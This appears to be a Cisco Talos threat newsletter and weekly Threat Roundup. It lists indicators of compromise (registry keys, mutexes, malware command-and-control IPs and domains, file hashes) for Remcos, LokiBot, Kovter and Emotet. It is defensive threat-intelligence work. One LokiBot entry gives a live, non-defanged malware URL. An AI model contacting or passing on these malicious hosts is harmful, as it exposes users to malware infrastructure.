Did you update all of your Microsoft products after Patch Tuesday earlier this month? If not, what are you waiting for? Listen to the latest Beers with Talos episode about why that’s stupid, and then immediately update.

Last week marked the one-year anniversary of VPNFilter. What has the security community learned since then? And how did this wide-reaching malware shape attacks since then? Find out in our blog post looking back on VPNFilter.

If you haven’t already, there’s still plenty of time to sign up for our upcoming spring Quarterly Threat Briefing. Talos researchers will be running down recent DNS manipulation-based attacks, and outline why your organization needs to be worried about them.

Finally, we also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

Upcoming public engagements with Talos

Event: Bsides London
Location: ILEC Conference Centre, London, England
Date: June 5
Speaker: Paul Rascagnères
Synopsis: Privacy has become a more public issue over time with the advent of instant messaging and social media. Secure Instant Messaging (SIM) has even become a problem for governments to start worrying about. While many people are using these messaging apps, it’s opened up the door for attackers to create phony, malicious apps that claim to offer the same services. In this talk, Paul will show various examples of these cloned applications and the different techniques used to send data back to the attacker.

Event: Cisco Connect Norway
Location: X Meeting Point, Skjetten, Norway
Date: June 6
Speaker: Vanja Svajcer
Synopsis: Vanja will offer a glimpse at how Cisco Talos analyzes the modern threat landscape and what customers can do to achieve a greater level of security.

Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
Location: Metro Toronto Convention Center, Toronto, Canada
Date: Oct. 7 - 10
Speaker: Edmund Brumaghin and Earl Carter
Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more. 

Cyber Security Week in Review

  • The city of Baltimore estimates the cost of a recent ransomware attack is approximately $18.2 million. Officials have refused to pay the ransom to retrieve its data.
  • The latest version of the HawkEye keylogger was used in a recent attack against several different industries. HawkEye Reborn, which was discovered by Cisco Talos in April, was spotted being used against several companies, including those in the health care, agriculture and marketing industries.
  • Secure email provider ProtonMail pushed back on claims that it offers assistance to law enforcement agencies in tracking suspects. The company called statements made by a Swiss lawyer on his blog “factually incorrect.”
  • Apple released updates to iTunes and iCloud for Windows. The patches fix vulnerabilities recently disclosed in SQLite and WebKit. 
  • Chinese tech company Huawei asked a court to declare a ban on its products in the U.S. unconstitutional. A summary issued by the company states that the ban came without concrete facts that it poses a national security risk to Americans.
  • Parts of New Zealand’s national budget were released early as part of an alleged cyberattack. The country’s treasury secretary contacted law enforcement after his agency discovered 2,000 attempts to access secret budget documents.
  • The fast-food chain Checkers says its restaurants in at least 20 states were hit with credit card-skimming malware. An unknown number of customers had their names, payment card numbers and card expiration dates stolen as part of the attack.
  • A school district in New York will start testing facial recognition technology next week. The system is expected to be fully operational by the start of the next school year on Sept. 1.

Notable recent security issues

Title: Vulnerability could allow JavaScript to be injected into Internet Explorer 11 
Description: Researchers disclosed two new Microsoft zero-day vulnerabilities. One could allow an attacker to inject a DLL into Internet Explorer 11; after the injection, the exploit opens a file picker and an HTML page containing JavaScript that executes in a lower security context. The other is a privilege escalation vulnerability in Windows Error Reporting.
Snort SIDs: 50183, 50184

Title: Winnti malware now appears on Linux 
Description: A new variant of the Winnti malware has been spotted in the wild running on Linux machines. The malware acts as a backdoor for attackers and consists of two files: a main backdoor and a library that hides the malware's activity. Winnti's primary role is to handle communications and deploy other modules delivered directly from the command and control (C2) server.
Snort SIDs: 50164 - 50167 

Most prevalent malware files this week

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256: f08f4374674a8993ddaf89dcaf216bc6952d211763b8489366b0835f0eda1950
MD5: b9a5e492a6c4dd618613b1a2a9c6a4fb
Typical Filename: maf-task.zip
Claimed Product: N/A
Detection Name: PUA.Osx.Adware.Gt32supportgeeks::221862.in02

SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f 
MD5: e2ea315d9a83e7577053f52c974f6a5a
Typical Filename: Tempmf582901854.exe
Claimed Product: N/A
Detection Name: W32.AgentWDCR:Gen.21gn.1201

SHA 256: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b
MD5: 799b30f47060ca05d80ece53866e01cc
Typical Filename: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b.bin
Claimed Product: N/A
Detection Name: W32.Generic:Gen.22fz.1201

SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510 
MD5: 4a50780ddb3db16ebab57b0ca42da0fb
Typical Filename: wup.exe
Claimed Product: N/A 
Detection Name: W32.7ACF71AFA8-95.SBX.TG


Threat Roundup for May 24 to May 31

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 24 and May 31. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

  • Win.Malware.Remcos-6978637-1
    Malware
    Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. Remcos is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
     
  • Win.Dropper.LokiBot-6978650-0
    Dropper
    Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails.
     
  • Win.Dropper.Kovter-6978831-0
    Dropper
    Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
     
  • Doc.Downloader.Emotet-6978977-0
    Downloader
    Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
     
  • Txt.Downloader.Nemucod-6979968-0
    Downloader
    Nemucod is a trojan that executes ransomware on a victim's computer.
     
  • Win.Dropper.Qakbot-6984556-0
    Dropper
    Qakbot, aka Qbot, has been around since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB.
     
  • Win.Malware.Kryptik-6983260-1
    Malware
    Kryptik is oftentimes a generic detection name for a Windows trojan. Some of the malicious activities that could be performed by these samples, without the user's knowledge, include collecting system information, downloading/uploading files and dropping additional samples.
     
  • Win.Ransomware.Gandcrab-6984356-1
    Ransomware
    GandCrab is ransomware that encrypts documents, photos, databases and other important files typically using the file extension ".GDCB", ".CRAB" or ".KRAB." GandCrab is spread through both traditional spam campaigns, as well as multiple exploit kits, including Rig and GrandSoft.
     
  • Win.Malware.DarkComet-6983986-1
    Malware
    DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
     

Threats

Win.Malware.Remcos-6978637-1


Indicators of Compromise


Registry Keys (occurrences in parentheses)
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: Mozilla (9)
<HKCU>\Software\Microsoft\Windows Script Host\Settings (1)
<HKCU>\Software\Remcos-8L6ET9 (1)
<HKCU>\SOFTWARE\REMCOS-8L6ET9, Value Name: exepath (1)
<HKCU>\SOFTWARE\REMCOS-8L6ET9, Value Name: licence (1)
<HKCU>\Software\Remcos-DMGAK8 (1)
<HKCU>\SOFTWARE\REMCOS-DMGAK8, Value Name: exepath (1)
<HKCU>\SOFTWARE\REMCOS-DMGAK8, Value Name: licence (1)
<HKCU>\Software\explorer-N7CBD4 (1)
<HKCU>\SOFTWARE\EXPLORER-N7CBD4, Value Name: EXEpath (1)
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: explorer (1)
<HKCU>\SOFTWARE\EXPLORER-N7CBD4, Value Name: WD (1)
<HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\34ONMET3ZF (1)
<HKCU>\Software\Remcos-LMBBE5 (1)
<HKCU>\SOFTWARE\REMCOS-LMBBE5, Value Name: exepath (1)
<HKCU>\SOFTWARE\REMCOS-LMBBE5, Value Name: licence (1)
<HKCU>\Software\Remcos-A2GPXU (1)
<HKCU>\SOFTWARE\REMCOS-A2GPXU, Value Name: exepath (1)
<HKCU>\SOFTWARE\REMCOS-A2GPXU, Value Name: licence (1)
<HKCU>\Software\Remcos-4ACKPE (1)
<HKCU>\SOFTWARE\REMCOS-4ACKPE, Value Name: exepath (1)
<HKCU>\SOFTWARE\REMCOS-4ACKPE, Value Name: licence (1)
<HKCU>\SOFTWARE\REMCOS-4ACKPE, Value Name: FR (1)

Mutexes (occurrences in parentheses)
Remcos_Mutex_Inj (6)
3749282D282E1E80C56CAE5A (1)
A16467FA-7343A2EC-6F235135-4B9A74AC-F1DC8406A (1)
eed3bd3a-a1ad-4e99-987b-d7cb3fcfa7f0 - S-1-5-21-2580483871-590521980-3826313501-500 (1)
\BaseNamedObjects\Mutex_RemWatchdog (1)
\BaseNamedObjects\3BA87BBD1CC40F3583D46680 (1)
Remcos-8L6ET9 (1)
Remcos-DMGAK8 (1)
explorer-N7CBD4 (1)
Remcos-LMBBE5 (1)
Remcos-A2GPXU (1)
Remcos-4ACKPE (1)
\BaseNamedObjects\explorer-N7CBD4 (1)

IP Addresses contacted by malware. Does not indicate maliciousness (occurrences in parentheses)
91[.]193[.]75[.]9 (2)
184[.]75[.]209[.]157 (1)
91[.]193[.]75[.]115 (1)
46[.]105[.]127[.]143 (1)
185[.]244[.]31[.]63 (1)
47[.]254[.]172[.]117 (1)
185[.]247[.]228[.]210 (1)

Domain Names contacted by malware. Does not indicate maliciousness (occurrences in parentheses)
uaeoffice999[.]warzonedns[.]com (2)
ml[.]warzonedns[.]com (1)
begurtyut[.]info (1)
ableyahweh[.]ddns[.]net (1)
kingmethod111[.]duckdns[.]org (1)
amblessed[.]ddns[.]net (1)
kobiremcos2[.]punkdns[.]top (1)
bio4kobs[.]geekgalaxy[.]com (1)
kobiremcos3[.]punkdns[.]top (1)
kobiremcos[.]punkdns[.]top (1)

Files and/or directories created (occurrences in parentheses)
%LOCALAPPDATA%\TVcard.exe (9)
%LOCALAPPDATA%\Mozilla\StatsReader.exe (9)
%LOCALAPPDATA%\Thex.bmp (9)
%APPDATA%\remcos (5)
%APPDATA%\remcos\logs.dat (5)
E:\TVcard.exe (5)
\TVcard.exe (5)
%HOMEPATH%\Local Settings\Application Data\TVcard.exe (5)
%HOMEPATH%\Local Settings\Application Data\Mozilla\StatsReader.exe (5)
%LOCALAPPDATA%\Mozilla\MiniConvert.exe (5)
%LOCALAPPDATA%\Sys.ocx (5)
%HOMEPATH%\Local Settings\Application Data\Thex.bmp (5)
%ProgramData%\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol (3)
%LOCALAPPDATA%\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol (3)
%HOMEPATH%\Local Settings\Application Data\Mozilla\MiniConvert.exe (3)
%HOMEPATH%\Local Settings\Application Data\Sys.ocx (3)
%APPDATA%\D282E1\1E80C5.lck (1)
%APPDATA%\D1CC40\0F3583.hdb (1)
%APPDATA%\D1CC40\0F3583.lck (1)
\??\E:\explorer.exe (1)
\explorer.exe (1)
%ProgramFiles%\Microsoft DN1 (1)
%APPDATA%\D1CC40\0F3583.exe (copy) (1)
%LOCALAPPDATA%\Microsoft Vision (1)
%TEMP%\install.vbs (1)
See JSON for more IOCs
File Hashes
  • 254cc60f64f6db8b54b2033d95f57f6a7f5c8ceea890ccc85f74570eab725b56
  • 5246657574c87126f2bd268b17f5a4bc44e4dd256cf6eff493c2250c7b1c3d3e
  • 5325269f4a381c1c7815863de0dd50b208944993d1f61c38a9f521be609827de
  • 585f0d663b32f025514e3740e5ac8dd007f777ce0c384fe664b3266c4159289d
  • 9484de151f507a81bb04f24b8bccbe4a63bfe0a1df7ea40ba5a076a52599af63
  • a233e5ce1fc0df70599f3fe8de20d512aac0b59d9d99df58894a34bba89ec81f
  • a969c6228f0de0426084c36c27615dbfa864c71a61c7c4f413fd862fc821db95
  • c71a6c05644b6fa09da4dc8c8d808bc7b0eaa3cac989d5f414cbbb79abea9b37
  • c916075ef74d579828ecb7fb1805076ac3929daac5b43b3c9d22c36d2239cbba
  • d8b92e14d57fb295a1102e9e89c2bdee0e332d87a003d3721b76e1e9eeaa7eb5
  • d9b94599e186e1c3a2507f1672a4a1b9492b4eb3c1a3547b3498c54275306765

Coverage

Screenshots of Detection: ThreatGrid, Umbrella

Win.Dropper.LokiBot-6978650-0

Indicators of Compromise

Registry Keys  Occurrences
<HKCU>\Software\WinRAR 1
<HKLM>\http://45.67.14.182/slk8/b/cat.php 1
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9
Value Name: F
1
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5
Value Name: F
1
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC
Value Name: F
1
<HKCU>\SOFTWARE\WINRAR
Value Name: HWID
1
Mutexes  Occurrences
A16467FA-7343A2EC-6F235135-4B9A74AC-F1DC8406A  6
3749282D282E1E80C56CAE5A  5
\BaseNamedObjects\3BA87BBD1CC40F3583D46680  4
\BaseNamedObjects\A238FB80-2231ABE6-BF235135-4DF622E2-F156829B3  1
\BaseNamedObjects\A238FB80-2231ABE6-BF235135-47749B25-DB14F8DE1  1
IP Addresses contacted by malware (does not indicate maliciousness)  Occurrences
185[.]79[.]156[.]24  3
185[.]79[.]156[.]18  3
185[.]79[.]156[.]23  2
45[.]67[.]14[.]182  2
Domain Names contacted by malware (does not indicate maliciousness)  Occurrences
N/A  -
Files and/or directories created  Occurrences
%ProgramData%\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol  6
%LOCALAPPDATA%\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol  6
%APPDATA%\D282E1\1E80C5.lck  5
%APPDATA%\wfsgsybinp\spflmbuwjdxpyke.exe  5
%TEMP%\2fda\api-ms-win-core-heap-l1-1-0.dll  4
%TEMP%\2fda\api-ms-win-core-interlocked-l1-1-0.dll  4
%TEMP%\2fda\api-ms-win-core-libraryloader-l1-1-0.dll  4
%TEMP%\2fda\api-ms-win-core-localization-l1-2-0.dll  4
%TEMP%\2fda\api-ms-win-core-memory-l1-1-0.dll  4
%TEMP%\2fda\api-ms-win-core-namedpipe-l1-1-0.dll  4
%TEMP%\2fda\api-ms-win-core-processenvironment-l1-1-0.dll  4
%TEMP%\2fda\api-ms-win-core-processthreads-l1-1-0.dll  4
%TEMP%\2fda\api-ms-win-core-processthreads-l1-1-1.dll  4
%TEMP%\2fda\api-ms-win-core-profile-l1-1-0.dll  4
%TEMP%\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll  4
%TEMP%\2fda\api-ms-win-core-string-l1-1-0.dll  4
%TEMP%\2fda\api-ms-win-core-synch-l1-1-0.dll  4
%TEMP%\2fda\api-ms-win-core-synch-l1-2-0.dll  4
%TEMP%\2fda\api-ms-win-core-sysinfo-l1-1-0.dll  4
%TEMP%\2fda\api-ms-win-core-timezone-l1-1-0.dll  4
%TEMP%\2fda\api-ms-win-core-util-l1-1-0.dll  4
%TEMP%\2fda\api-ms-win-crt-conio-l1-1-0.dll  4
%TEMP%\2fda\api-ms-win-crt-convert-l1-1-0.dll  4
%TEMP%\2fda\api-ms-win-crt-environment-l1-1-0.dll  4
%TEMP%\2fda\api-ms-win-crt-filesystem-l1-1-0.dll  4
See JSON for more IOCs
File Hashes
  • 1efb2130e792e899d3fee5b0582e61b54f9bdafd00ae43e727d618d462a64a42
  • 316522e4f97f2d4f6d568093a043624cbb02d46eb5a7e0f6accfdb188cf1528f
  • 319d22b549bcbabce103c5d1359ac65f8e8ae49bff6287de21f3f9ef3138646d
  • 36ba85a2d278fb599de9dd36adbe289c39264055996b764d8979f45bcf123535
  • 39b14c7b01c68dbd67963156b813ff89c3755b4f12643e6bc92f6ff4b14f40ee
  • 680d1d8de9f13d9763a6bc8b2585840b70b7ca6c0f45470bed65f0ce5ca8f908
  • 737b0f10471e7d73ec2227dba9250c5130f16b083bc34773e112d72ded4f9e8b
  • 7ccb34bd9651f6f27d531128d839d8d0c1853f2b6f29fed69b7e19448bfd3024
  • 8772387a55e177ff01fa20b6941dddde054c594eee8098cdf96a57e2ccb78b7d
  • 8a4d4491deaea94a51586c5098055c335831b37c17f3d8449fba197dfe73a83d
  • 98ece7de8b60e356d6a965c8fecc089b86e67e2c29faa941f7cae0a64537abb9
  • ba11b9b4c9e0084e5ae5d0de45761b6bd6ebbb62d41c93c7a23ceeda8461d4b1
  • bda55e17c599b80c688e93249375fb027754aef373ecf8a05f205f1ff4bbf21d
  • e650008c2c991f8064942ff5609617d07b4589d40a3e9e37c3c4885898f29f54
  • ea123c9b6299186b1319ec6572bd16fb6a28185f2e9ddb9aa1bf3e52f1911b5d
  • efa28604a547613b68480f7e8ac59f8d02931f5b8d4be6971ea96aff253d5d1a

Coverage

Screenshots of Detection: ThreatGrid

Win.Dropper.Kovter-6978831-0

Indicators of Compromise

Registry Keys  Occurrences
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE
Value Name: DisableOSUpgrade
25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE
Value Name: ReservationsAllowed
25
<HKLM>\SOFTWARE\WOW6432NODE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WindowsUpdate 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUpgrade 25
<HKCU>\SOFTWARE\3a91c13ab1 25
<HKLM>\SOFTWARE\WOW6432NODE\3a91c13ab1 25
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: 656f27d6
25
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: 656f27d6
25
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: 96f717b3
25
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: 96f717b3
25
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: ffcfae7b
25
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: ffcfae7b
25
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: 01b2a448
20
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: 01b2a448
20
<HKLM>\SOFTWARE\WOW6432NODE\RDAW2P1XI
Value Name: tnzJBB
1
<HKLM>\SOFTWARE\WOW6432NODE\XBZ0H3
Value Name: Emk9DIqKS
1
<HKLM>\SOFTWARE\WOW6432NODE\RDAW2P1XI
Value Name: yw6yqsnsb
1
<HKLM>\SOFTWARE\WOW6432NODE\765B49A5A77BF31D 1
<HKLM>\SOFTWARE\WOW6432NODE\byvWyhji 1
<HKLM>\SOFTWARE\WOW6432NODE\765B49A5A77BF31D
Value Name: D347D67C3DAC5505
1
<HKLM>\SOFTWARE\WOW6432NODE\BYVWYHJI
Value Name: aL0JVbstG
1
<HKLM>\SOFTWARE\WOW6432NODE\BYVWYHJI
Value Name: ESqO4Lrhe
1
<HKLM>\SOFTWARE\WOW6432NODE\062D56AB77939C4FB63 1
<HKLM>\SOFTWARE\WOW6432NODE\1ZBB6iJuv 1
Mutexes  Occurrences
B3E8F6F86CDD9D8B  25
A83BAA13F950654C  25
EA4EC370D1E573DA  25
Global\7A7146875A8CDE1E  25
\BaseNamedObjects\408D8D94EC4F66FC  15
\BaseNamedObjects\Global\350160F4882D1C98  15
\BaseNamedObjects\053C7D611BC8DF3A  15
IP Addresses contacted by malware (does not indicate maliciousness)  Occurrences
104[.]170[.]60[.]26  1
144[.]193[.]156[.]187  1
88[.]105[.]164[.]83  1
169[.]202[.]2[.]58  1
208[.]229[.]136[.]68  1
186[.]120[.]237[.]204  1
28[.]237[.]185[.]18  1
216[.]21[.]9[.]183  1
217[.]156[.]137[.]119  1
11[.]136[.]96[.]41  1
90[.]235[.]33[.]244  1
189[.]30[.]93[.]102  1
85[.]82[.]241[.]240  1
87[.]213[.]1[.]121  1
42[.]75[.]114[.]211  1
204[.]6[.]62[.]16  1
112[.]78[.]74[.]19  1
163[.]112[.]153[.]66  1
17[.]210[.]26[.]114  1
27[.]3[.]105[.]38  1
100[.]27[.]228[.]124  1
130[.]139[.]163[.]141  1
128[.]215[.]237[.]245  1
23[.]138[.]20[.]236  1
167[.]165[.]229[.]191  1
See JSON for more IOCs
Domain Names contacted by malware (does not indicate maliciousness)  Occurrences
www[.]cloudflare[.]com  1
demo[.]wylynx[.]com  1
aviators-auth[.]coxhn[.]net  1
Files and/or directories created  Occurrences
\InitShutdown  18
\winreg  18
%SystemRoot%\SysWOW64\tzres.dll  1
File Hashes
  • 0715f9f01ebbe56625dd3e970d7437d97564648e85990c9bdf142b4ecdaca3f1
  • 07285e9593636743a333a3338ab93bf095fa0907451e471084cd609e7c938281
  • 097d7d04e897eca987e28fa7f65a0c3ade12a71de1c758a9a4f5f925c5c602d8
  • 0a297b9d84a638e994b2c7fec6df3b3847404731fb7c71562f1ccc0ae75506ab
  • 0c8b9fa3bbdce9c015b000de00360c16203166088f2e7221af3e790e73095403
  • 11bc7f1f1a3cda33e2f6240ab1e88e468c3a63e5ea3a329946992b737e296136
  • 16e7c3a7b2a49e61db54ac870d796c37f9e671f64647887f1489ad3bd5ff626c
  • 260572ea7138b64d15936143a9a547bab095151cc4d2ee8e2e9b7daf305fb2be
  • 26f53bfdf087e36f3d13e5277b12e38ddb1b4989dd009f3f092d1954da0b8717
  • 28766b46246a485e4c226ff90d93392cf2c706ed3bc60aa0d67fd2772130a985
  • 2c32a26d84981b540b5fac0d466092c9a72c93723c2a36d643e6ff8cb8a8067d
  • 2cfaede6d177df3e4eff37f5f99cb6a3353d76eac59a708f553abf8269dd2aca
  • 30ae1dda31fe6473f13e54e01ad124ad3ea919ceaf196cb9f240ca1dfd79ed4a
  • 3509a633922b3ede20640ffff30ffa13785f3972c4228bce33d631458825fe24
  • 37bc5d2235c55b03d1b3270f88dac6f210400a192d85c85405593424af5c4c60
  • 3a105a570eab21e12a4895a0ccf65b0d4b2bff313567e3e52119b1c14e8ea750
  • 3c3166135909f4e982f313d6f28cbd44057f96a9ace0b1ffc9fd085d577fc4aa
  • 3ea71c0fcc071c4eb5195f17a6b35156a5cc3602b2e1f5a6e90f9cb2ea315a07
  • 3eb27755726ae476869cd8054527c1d0f6f49365c9efda8887013af895146c05
  • 42561fe7ca1b2322cbe4d910d4c6d7d74a7089a33974a0bef7a45f7235267cd6
  • 42ac2333962667d01a4296c64cfd907880c64dfbb9439a3a471f8080024e9d07
  • 53dc0aee9d383c234bf9ffd2a49a25ae2affc2275b8806a72e343744f0a9e2ad
  • 56ac99cd20dce48020e300dd3b46e9813552ad890b5e52e3d1c46247f6bb8cae
  • 5700b5bfde766173f1dce5ccceb7ba015c22cb327f9591e700b8ebacfd158ed5
  • 597f778320e6a1a30ab8905f7abdc796c490bd0a87f09c0a02f7849eb0b80585
  • See JSON for more IOCs

Coverage

Screenshots of Detection: AMP, ThreatGrid

Doc.Downloader.Emotet-6978977-0

Indicators of Compromise

Registry Keys  Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\sourcebulk 38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: Type
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: Start
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: ErrorControl
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: ImagePath
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: DisplayName
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: WOW64
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: ObjectName
38
Mutexes  Occurrences
Global\I98B68E3C  38
Global\M98B68E3C  38
IP Addresses contacted by malware (does not indicate maliciousness)  Occurrences
115[.]71[.]233[.]127  35
74[.]207[.]227[.]96  28
23[.]95[.]95[.]18  28
172[.]217[.]6[.]211  24
65[.]55[.]72[.]183  23
74[.]6[.]136[.]150  21
69[.]147[.]92[.]11  18
74[.]6[.]141[.]50  17
212[.]77[.]101[.]141  17
69[.]147[.]92[.]12  17
196[.]25[.]211[.]150  16
212[.]227[.]17[.]168  16
212[.]77[.]101[.]1  16
172[.]217[.]12[.]211  15
159[.]127[.]187[.]12  15
173[.]194[.]207[.]108  15
72[.]167[.]238[.]29  13
104[.]131[.]11[.]150  13
64[.]91[.]228[.]45  13
200[.]27[.]156[.]230  13
64[.]4[.]244[.]68  12
200[.]27[.]156[.]160  12
207[.]204[.]50[.]10  11
68[.]178[.]213[.]203  11
213[.]165[.]67[.]108  11
See JSON for more IOCs
Domain Names contacted by malware (does not indicate maliciousness)  Occurrences
blog[.]laviajeria[.]com  25
smtp[.]aol[.]com  17
mail[.]wp[.]pl  17
smtp[.]wp[.]pl  16
mail[.]aol[.]com  15
mail[.]paypal[.]com  15
smtp[.]telkomsa[.]net  14
pop3[.]telkomsa[.]net  13
golfingtrail[.]com  13
smtpout[.]secureserver[.]net  12
smtp[.]mail[.]ru  12
mail[.]web[.]de  12
smtp[.]paypal[.]com  12
imap[.]secureserver[.]net  11
smtp[.]orange[.]fr  11
mail[.]secureserver[.]net  10
smtp[.]1und1[.]de  10
smtp[.]outlook[.]com  9
smtp[.]yahoo[.]co[.]uk  9
smtp[.]secureserver[.]net  8
mail[.]rochester[.]rr[.]com  8
mail[.]ccsu[.]edu  8
premium68[.]web-hosting[.]com  8
mail[.]gmx[.]de  7
mail[.]msn[.]com  7
See JSON for more IOCs
Files and/or directories created  Occurrences
%HOMEPATH%\905.exe  25
%HOMEPATH%\985.exe  13
%SystemRoot%\Registration\R000000000005.clb  1
%SystemRoot%\SysWOW64\sourcebulka.exe  1
%SystemRoot%\SysWOW64\RaIsI.exe  1
%SystemRoot%\SysWOW64\b7CLyYeMYOz.exe  1
%SystemRoot%\SysWOW64\JAfDaABdFwDwQOmU.exe  1
%SystemRoot%\SysWOW64\XsURGMXS03AY8k5H.exe  1
%SystemRoot%\SysWOW64\B3G3HJkHw.exe  1
%SystemRoot%\SysWOW64\OACv5sbfWOqW.exe  1
%SystemRoot%\SysWOW64\vQPrd2DqNc.exe  1
%SystemRoot%\SysWOW64\eZctuX442LBnjCR.exe  1
%SystemRoot%\SysWOW64\G4gruKLDsT8Hqq.exe  1
%SystemRoot%\SysWOW64\H2TI.exe  1
%SystemRoot%\SysWOW64\0UiKEdt.exe  1
%SystemRoot%\SysWOW64\lI7hCDdPp88lp9wc9FI.exe  1
%SystemRoot%\SysWOW64\jvfRQuzTShGWsLy.exe  1
%SystemRoot%\SysWOW64\pFZeNxzUSolEMyg5jlf.exe  1
%TEMP%\CVR99F.tmp  1
%SystemRoot%\SysWOW64\s5nWep8.exe  1
%SystemRoot%\SysWOW64\OBG55Zcwc0ZIAIzMsrO.exe  1
%SystemRoot%\SysWOW64\rrLgU5ygLqi.exe  1
%SystemRoot%\SysWOW64\Bbnxe2ZT28fYyG.exe  1
%SystemRoot%\SysWOW64\4CrV663kwXBhNO.exe  1
%SystemRoot%\SysWOW64\rnrtEbeM2u.exe  1
See JSON for more IOCs
File Hashes
  • 08891649a39702f90e11f8ff3035fd16c8f2431d16eeb4919382414735a342be
  • 10b5e211a2e7f00f87d2074a183f9870459e588772f2434ae2e597f800f8522a
  • 173f2078c872504912c5878cac192ab6e7aee9da8f2b76505a7c201eec5af2f2
  • 17dbcd96af456b87e928609743c3a232e438e3b7f31be3f82d9912605a17e7e5
  • 1a1c4b3314857aed3c55053968fa6260693577ee18e59f29be78e9add0e52840
  • 1afd12fda74676381f591b7e2dd6dd2510e603308504a73c880ab6990bd49d32
  • 28398ed10fb49cc49f2cf4559ccbd2b5ce7213c0d62694dd637a5ec8d304352b
  • 286d190e59b9fea171a55e2d99f2c4c5a66560c2e919199a67a6a960f5acd079
  • 2875510d0044c059a8f554aa8401cacd69f806a46205632a11c02096ecb6a0e8
  • 29a3ee36c05e27f07958695833e5f49f2579ce005fabd6048d74285b9dfc40e9
  • 40abbe8ec1e3c31efdedfabaeadc4cdcb88e918f7a0ed7dd3092e26fb2dd676e
  • 4e82b20ca98af17b4361fe688bce991cd907e25c139b9da39340fd758a6bd22b
